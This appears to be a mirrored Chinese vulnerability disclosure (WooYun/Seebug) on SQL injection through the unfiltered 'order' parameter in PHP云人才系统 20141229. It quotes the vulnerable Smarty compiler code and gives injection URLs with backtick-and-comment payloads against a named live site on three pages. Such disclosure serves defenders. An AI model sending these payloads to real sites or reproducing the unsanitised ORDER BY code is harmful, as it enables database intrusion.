PHP云人才系统(20141229)2处SQL注入

来源

http://wooyun.org/bugs/wooyun-2015-089489

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： PHP云人才系统(20141229)二处隐蔽的SQL注入 ### 详细说明： PHP云人才系统二处SQL注入。 0x01: 问答首页 ======================== URL为： ``` http://www.hr135.com/ask/index.php?order=add_time ``` 其中参数order可以注入。看看代码/include/libs/Smarty_Compiler.class.php：5330 ``` 5330 function _complie_qlist_start($tag_args) 5331 { 5332 $paramer = $this->_parse_attrs($tag_args); 5333 $item = str_replace("'","",$paramer[item]); 5334 global $db,$db_config,$config; 5335 $path = dirname(dirname(dirname(__FILE__))); 5336 $ParamerArr = $this->GetSmarty($paramer,$_GET); 5337 $paramer = $ParamerArr[arr]; 5338 $Purl = $ParamerArr[purl]; 5339 5340 $where=1; 5341 //��ֶ�Ĭ��Ϊ��ʱ�� 5342 if($paramer[order]){ 5343 if($paramer[order]=="addtime"){ 5344 $paramer[order]="add_time"; 5345 } 5346 if($paramer[order]=="answernum"){ 5347 $paramer[order]="answer_num"; 5348 } 5349 $order = " ORDER BY `".$paramer[order]."` desc"; 5350 }else{ 5351 $order = " ORDER BY `add_time` desc"; 5352 } 5353 if($paramer[cid]){ 5354 $where .=" and `cid`='".$paramer[cid]."'"; 5355 } 5356 if($paramer[uid]){ 5357 $where .=" and `uid`='".$_COOKIE[uid]."'"; 5358 } 5359 if($paramer[recom]){//�Ƽ� �ֶ� 5360 $where .=" and `is_recom`='1'"; 5361 } 5362 if($paramer[limit]){ 5363 $limit=" limit ".$paramer[limit]; 5364 } 5365 if($paramer[ispage]){ 5366 $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2"); 5367 //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2'); 5368 //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl]; 5369 } 5370 $rs = $db->select_all("question",$where.$order.$limit); ``` 里面的5349行将$paramer[order]带入了SQL，由于有``,但是addslashs不会修改`,所以可以注入`闭合原来SQL，然后插入SQL语句。再看看调用的地方，/ask/model/index.class.php：26 ``` 26 function index_action(){ 27 $this->public_action(); 28 $this->yunset("c","index"); 29 $this->yunset("order",$_GET['order']); 30 $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids"); 31 $my_atten=@explode(',',rtrim($my_attention['ids'],",")); 32 $this->seo('ask_index'); 33 $this->yunset("my_atten",$my_atten); 34 $this->wenda_tpl('index'); 35 } ``` $this->yunset("order",$_GET['order']);没有过滤order，传递给参数@order。然后在模版里面template/ask/index.htm:15 ``` 15 {yun:}qlist item=qlist ispage=1 t_len=20 order=@order limit=10{/yun} 16 <div class="answers_left_list"> 17 <div class="answers_left_list_left"> 18 <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer"> 19 <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);"> 20 </div> 21 </div> ``` 在第15行将@order传递给了_complie_qlist_start(). ``` http://www.hr135.com/ask/index.php?order=add_time` ``` SQL出错没有任何数据 [<img src="https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23 ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png) 0x02: 找工作搜索页 ======================== URL为： ``` http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a ``` order参数可以注入。 ``` http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a ``` SQL出错，没有数据 [<img src="https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a ``` 取两天数据： [<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png) 0x03: 招人才首页 ======================== URL为： ``` http://www.hr135.com/index.php?m=user&order=status_time ``` 其中参数order可以注入。 ``` http://www.hr135.com/index.php?m=user&order=status_time` ``` SQL出错，没有数据： [<img src="https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23 ``` 取一条数据： [<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png) ``` http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png) [<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png) ``` http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a ``` 取两天数据： [<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png) [<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png) ``` http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23 ``` 取两条数据： [<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-089489

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

PHP云人才系统(20141229)2处SQL注入

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定